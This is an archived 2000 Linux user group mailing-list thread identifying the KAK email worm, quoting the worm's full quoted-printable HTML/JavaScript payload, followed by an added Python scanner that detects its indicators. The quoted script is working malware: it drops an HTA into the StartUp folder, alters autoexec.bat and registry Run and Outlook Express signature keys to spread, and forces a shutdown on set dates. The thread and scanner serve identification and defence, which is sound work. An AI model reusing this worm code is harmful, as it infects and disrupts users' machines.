[lug] Virus in the email....

Brian Ketelsen briank at becos.org
Fri Jun 9 08:19:18 MDT 2000


That is the KAK virus, a little beast that lives in HTML signatures of
infected Outlook / O. Express clients.  You can get info on it at
McAfee.com.  It isn't too powerful as virii go, but it is annoying.

Brian


----- Original Message -----
From: "Ryan Kirkpatrick" <rkirkpat at nag.cs.colorado.edu>
To: <lug at lug.boulder.co.us>
Sent: Friday, June 09, 2000 7:50 AM
Subject: [lug] Virus in the email....


>
> Ok, I got an interesting email this morning, and it was not even
> really for me. It was sent to the webmaster account for the website I
> admin, which of course meant it ended up in my email box. It was really
> meant for the other people at the company I work for. I get these every
> now and again, people not realizing where to send email, so I normally
> forward them on. But this time something caught my eye as a big wrong...
> The email was in both text and HTML, and the HTML version of the email
> contained what looks like a rather long JavaScript. :(
> I have excerpted from the email below the relevant sections. The
> human-readable contents of the email appeared perfectly normal and valid,
> so I don't think that part was forged by a computer program. But glancing
> through the script made me a bit worried. I don't even know if it is
> JavaScript or not. Might even be a copy of one of those infamous email
> viruses going around for all I know. Anyway, can anyone shed some light on
> this?
> Don't worry, what is below should not be executable provided you
> don't copy it to a separate file and try to load it in a web browser.
> Also, I emailed the sender warning them that their system might be
> infected and made sure that he had not sent any more emails to any of the
> addresses for the company.
>
> PS. Thank goodness for text only email readers. :)
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
> <HTML><HEAD>
> <META content=3D"text/html; charset=3Diso-8859-1" =
> http-equiv=3DContent-Type>
> <META content=3D"MSHTML 5.00.2014.210" name=3DGENERATOR>
> .........
> <DIV style=3D"POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
> <OBJECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC=20
> id=3Dscr></OBJECT></DIV>
> <SCRIPT><!--
> function sErr(){return =
> true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D"Z<HTML><HEAD><TITLE>Dr=
> iver Memory Error</"+"TITLE><HTA:APPLICATION ID=3D\"hO\" =
> WINDOWSTATE=3DMinimize></"+"HEAD><BODY BGCOLOR=3D#CCCCCC><object =
> id=3D'wsh' =
> classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIP=
> T>function sEr(){self.close();return true;}window.onerror=3DsEr;fs=3Dnew =
>
ActiveXObject('Scripting.FileSystemObject');wd=3D'C:\\\\Windows\\\\';fl=3D=
> fs.GetFolder(wd+'Applic~1\\\\Identities');sbf=3Dfl.SubFolders;for(var =
> mye=3Dnew =
> Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew =
>
String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD=C9=
> ~1\\\\PROGRA~1\\\\D=C9MARR~1\\\\kak.hta';ken=3Dwd+'STARTM~1\\\\Programs\\=
> \\StartUp\\\\kak.hta';k2=3Dwd+'System\\\\'+fic+'.hta';kk=3D(fs.FileExists=
> (kfr))?kfr:ken;aek=3D'C:\\\\AE.KAK';aeb=3D'C:\\\\Autoexec.bat';if(!fs.Fil=
> eExists(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs=
> .GetFile(aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr=
> )?wd+'MENUD=90~1\\\\PROGRA~1\\\\D=90MARR~1\\\\kak.hta':ken;t1.WriteLine('=
> @echo off>'+pth);t1.WriteLine('del =
> '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(=
> k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.reg');t2.write('REGEDI=
> T4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USER\\\\Identities\\\\'+id=
> n+'\\\\Software\\\\Microsoft\\\\Outlook =
> Express\\\\5.0';sg=3D'\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\=
> "Default =
> Signature\"=3D\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\=
> \\00000000]');t2.WriteLine('\"name\"=3D\"Signature =
>
#1\"');t2.WriteLine('\"type\"=3Ddword:00000002');t2.WriteLine('\"text\"=3D=
> \"\"');t2.Write('\"file\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.Wri=
> teBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature =
> Flags\"=3Ddword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCA=
> L_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]')=
> ;t2.Write('\"cAg0u\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.h=
> ta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s =
> '+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><B=
> ODY><DIV =
> style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT =
> classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC =
> id=3Dscr></"+"OBJECT></"+"DIV>');t4=3Dfs.OpenTextFile(k2,1);while(t4.Read=
> (1)!=3D'Z');t3.WriteLine('<SCRIPT><!--');t3.write('function =
> sErr(){return =
> true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.Read(3095=
> );t4.close();rd=3D/\\\\/g;re=3D/\"/g;rf=3D/<\\//g;rt=3Drs.replace(rd,'\\\=
> \\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\"=
> ;la=3D(navigator.systemLanguage)?navigator.systemLanguage:navigator.langu=
> age;scr.Path=3D(la=3D=3D\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu =
> D=E9marrer\\\\\\\\Programmes\\\\\\\\D=E9marrage\\\\\\\\kak.hta\":\"C:\\\\=
> \\\\windows\\\\\\\\Start =
> Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=3Dnavigator.user=
> Agent.toLowerCase();if(((agt.indexOf(\"msie\")!=3D-1)&&(parseInt(navigato=
> r.appVersion)>4))||(agt.indexOf(\"msie =
> 5.\")!=3D-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT>=
> </"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attribut=
> es=3D2;fs.DeleteFile(wd+'kak.reg');d=3Dnew Date();if(d.getDate()=3D=3D1 =
> && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today =
> !');wsh.Run(wd+'RUNDLL32.EXE =
> user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc =
> failed   =
> !]]%%%%%</"+"BODY></"+"HTML>";la=3D(navigator.systemLanguage)?navigator.s=
> ystemLanguage:navigator.language;scr.Path=3D(la=3D=3D"fr")?"C:\\windows\\=
> Menu D=E9marrer\\Programmes\\D=E9marrage\\kak.hta":"C:\\windows\\Start =
> Menu\\Programs\\StartUp\\kak.hta";agt=3Dnavigator.userAgent.toLowerCase()=
> ;if(((agt.indexOf("msie")!=3D-1)&&(parseInt(navigator.appVersion)>4))||(a=
> gt.indexOf("msie 5.")!=3D-1))scr.write();
> file://--></SCRIPT>
> </OBJECT></DIV></BODY></HTML>
>
>
> ---------------------------------------------------------------------------
> |   "For to me to live is Christ, and to die is gain."                    |
> |                                            --- Philippians 1:21 (KJV)   |
> ---------------------------------------------------------------------------
> |   Ryan Kirkpatrick  |  Boulder, Colorado  |  http://www.rkirkpat.net/   |
> ---------------------------------------------------------------------------
>
>
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
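A defender-side check for the pattern discussed in this thread, added here as an example and not part of either message. It parses a MIME mail, decodes the quoted-printable HTML part (so the `=3D` seen in the quoted message becomes a plain `=`), and flags the indicators visible in the quoted worm body: the Scriptlet.TypeLib and WScript.Shell ActiveX CLSIDs, the `<HTA:APPLICATION>` tag, `Scripting.FileSystemObject`, the `StartUp\kak.hta` drop path and the `CurrentVersion\Run` persistence key. The sample messages, the indicator names, the "two or more indicators" threshold and the function names are constructed for this illustration.

```python
"""Flag MIME messages whose HTML part carries the KAK-style ActiveX/HTA
dropper pattern quoted in this thread. Added example; indicator names,
threshold and sample mails are constructed, not from the original post."""
import email
import re
from email import policy

# CLSIDs exactly as they appear in the quoted message body.
SCRIPTLET_TYPELIB_CLSID = "06290BD5-48AA-11D2-8432-006008C3FBFC"  # Scriptlet.TypeLib
WSCRIPT_SHELL_CLSID = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"     # WScript.Shell

# Each indicator is one thing the quoted script does; a real mail should
# not need any of them, and two or more together is a strong signal.
INDICATORS = {
    "scriptlet_typelib_object": re.compile(r"clsid:" + SCRIPTLET_TYPELIB_CLSID, re.I),
    "wscript_shell_object": re.compile(r"clsid:" + WSCRIPT_SHELL_CLSID, re.I),
    "hta_application": re.compile(r"<HTA:APPLICATION\b", re.I),
    "filesystemobject": re.compile(r"Scripting\.FileSystemObject", re.I),
    "startup_hta_drop": re.compile(r"StartUp\\+kak\.hta", re.I),
    "run_key_persistence": re.compile(r"CurrentVersion\\+Run\]", re.I),
}


def html_parts(raw: bytes):
    """Yield the decoded text of every text/html part; the email package
    undoes quoted-printable / base64 transfer encoding for us."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            yield part.get_content()


def scan_message(raw: bytes) -> dict:
    """Return which indicators fired and whether the mail looks suspicious
    (constructed threshold: at least two independent indicators)."""
    hits = set()
    for html in html_parts(raw):
        for name, pattern in INDICATORS.items():
            if pattern.search(html):
                hits.add(name)
    return {"suspicious": len(hits) >= 2, "indicators": sorted(hits)}


# Constructed sample: an ordinary-looking text part plus an HTML part that
# carries the OBJECT/HTA fragments in quoted-printable, as in the thread.
SAMPLE_MAIL = b"""\
From: sender@example.invalid
To: webmaster@example.invalid
Subject: constructed sample (not a real message)
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Hi, please see the attached figures.

--b1
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><BODY>Hi, please see the attached figures.
<DIV style=3D"POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=3Dscr></OBJECT></DIV>
<SCRIPT>scr.doc=3D"<HTA:APPLICATION ID=3D\\"hO\\" WINDOWSTATE=3DMinimize>";</SCRIPT>
</BODY></HTML>

--b1--
"""

# Constructed benign sample: same layout, harmless HTML.
CLEAN_MAIL = b"""\
From: sender@example.invalid
To: webmaster@example.invalid
Subject: constructed clean sample
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b2"

--b2
Content-Type: text/plain; charset="iso-8859-1"

Meeting moved to 3pm.

--b2
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><BODY><P style=3D"color: blue">Meeting moved to 3pm.</P></BODY></HTML>

--b2--
"""

if __name__ == "__main__":
    print(scan_message(SAMPLE_MAIL))
    print(scan_message(CLEAN_MAIL))
```

Running the block prints a hit on the sample (Scriptlet.TypeLib object plus HTA tag) and nothing on the clean mail. The regexes are deliberately applied to the decoded HTML, not the raw wire bytes, because the quoted-printable soft line breaks (`=` at end of line) split identifiers such as the CLSID across lines and would defeat a naive grep of the raw message, which is exactly what makes the quoted body look so unreadable in the thread.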